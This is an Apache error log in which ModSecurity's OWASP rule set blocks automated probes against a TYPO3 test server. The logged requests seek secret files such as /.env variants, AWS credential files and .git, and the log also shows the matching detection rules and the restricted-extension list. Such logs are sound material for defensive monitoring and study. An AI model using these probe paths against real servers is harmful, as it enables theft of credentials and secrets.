[Sun Jun 08 02:26:44.309961 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aETYxBa8k0A1fnYogFi4UwAAAAQ"]
[Sun Jun 08 02:26:44.310186 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aETYxBa8k0A1fnYogFi4UwAAAAQ"]
[Sun Jun 08 02:26:44.310411 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aETYxBa8k0A1fnYogFi4UwAAAAQ"]
[Sun Jun 08 02:26:45.384127 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/user/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aETYxRa8k0A1fnYogFi4VAAAAAQ"]
[Sun Jun 08 02:26:45.384332 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aETYxRa8k0A1fnYogFi4VAAAAAQ"]
[Sun Jun 08 02:26:45.384540 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aETYxRa8k0A1fnYogFi4VAAAAAQ"]
[Sun Jun 08 02:26:46.069023 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aETYxha8k0A1fnYogFi4VQAAAAQ"]
[Sun Jun 08 02:26:46.069262 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aETYxha8k0A1fnYogFi4VQAAAAQ"]
[Sun Jun 08 02:26:46.069465 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aETYxha8k0A1fnYogFi4VQAAAAQ"]
[Sun Jun 08 02:26:46.861742 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aETYxha8k0A1fnYogFi4VgAAAAQ"]
[Sun Jun 08 02:26:46.861954 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aETYxha8k0A1fnYogFi4VgAAAAQ"]
[Sun Jun 08 02:26:46.862155 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aETYxha8k0A1fnYogFi4VgAAAAQ"]
[Sun Jun 08 02:26:47.731221 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aETYxxa8k0A1fnYogFi4VwAAAAQ"]
[Sun Jun 08 02:26:47.731434 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aETYxxa8k0A1fnYogFi4VwAAAAQ"]
[Sun Jun 08 02:26:47.731641 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aETYxxa8k0A1fnYogFi4VwAAAAQ"]
[Sun Jun 08 02:26:48.833502 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aETYyBa8k0A1fnYogFi4WAAAAAQ"]
[Sun Jun 08 02:26:48.833729 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aETYyBa8k0A1fnYogFi4WAAAAAQ"]
[Sun Jun 08 02:26:48.833941 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aETYyBa8k0A1fnYogFi4WAAAAAQ"]
[Sun Jun 08 02:26:52.869943 2025] [authz_core:error] [pid 3707674] [client 107.150.0.115:45432] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sun Jun 08 02:26:54.299274 2025] [authz_core:error] [pid 3707674] [client 107.150.0.115:45432] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Mon Jun 09 07:05:29.871808 2025] [authz_core:error] [pid 3732066] [client 13.39.163.23:36796] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jun 09 20:16:18.160738 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEck8p3hwxzzahSGXRvczgAAAAc"]
[Mon Jun 09 20:16:18.161064 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEck8p3hwxzzahSGXRvczgAAAAc"]
[Mon Jun 09 20:16:18.161227 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEck8p3hwxzzahSGXRvczgAAAAc"]
[Mon Jun 09 20:16:18.236151 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEck8p3hwxzzahSGXRvc0AAAAAc"]
[Mon Jun 09 20:16:18.236427 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEck8p3hwxzzahSGXRvc0AAAAAc"]
[Mon Jun 09 20:16:18.236584 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEck8p3hwxzzahSGXRvc0AAAAAc"]
[Mon Jun 09 20:16:18.259006 2025] [authz_core:error] [pid 3743366] [client 185.177.72.106:4448] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Mon Jun 09 20:16:18.282007 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEck8p3hwxzzahSGXRvc0gAAAAc"]
[Mon Jun 09 20:16:18.282225 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEck8p3hwxzzahSGXRvc0gAAAAc"]
[Mon Jun 09 20:16:18.282390 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEck8p3hwxzzahSGXRvc0gAAAAc"]
[Mon Jun 09 20:16:18.305030 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEck8p3hwxzzahSGXRvc0wAAAAc"]
[Mon Jun 09 20:16:18.305250 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEck8p3hwxzzahSGXRvc0wAAAAc"]
[Mon Jun 09 20:16:18.305396 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEck8p3hwxzzahSGXRvc0wAAAAc"]
[Mon Jun 09 20:16:18.327842 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEck8p3hwxzzahSGXRvc1AAAAAc"]
[Mon Jun 09 20:16:18.327991 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEck8p3hwxzzahSGXRvc1AAAAAc"]
[Mon Jun 09 20:16:18.328189 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEck8p3hwxzzahSGXRvc1AAAAAc"]
[Mon Jun 09 20:16:18.328343 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEck8p3hwxzzahSGXRvc1AAAAAc"]
[Mon Jun 09 20:16:18.351053 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEck8p3hwxzzahSGXRvc1QAAAAc"]
[Mon Jun 09 20:16:18.351246 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEck8p3hwxzzahSGXRvc1QAAAAc"]
[Mon Jun 09 20:16:18.351386 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEck8p3hwxzzahSGXRvc1QAAAAc"]
[Mon Jun 09 20:16:18.454737 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEck8p3hwxzzahSGXRvc2AAAAAc"]
[Mon Jun 09 20:16:18.454942 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEck8p3hwxzzahSGXRvc2AAAAAc"]
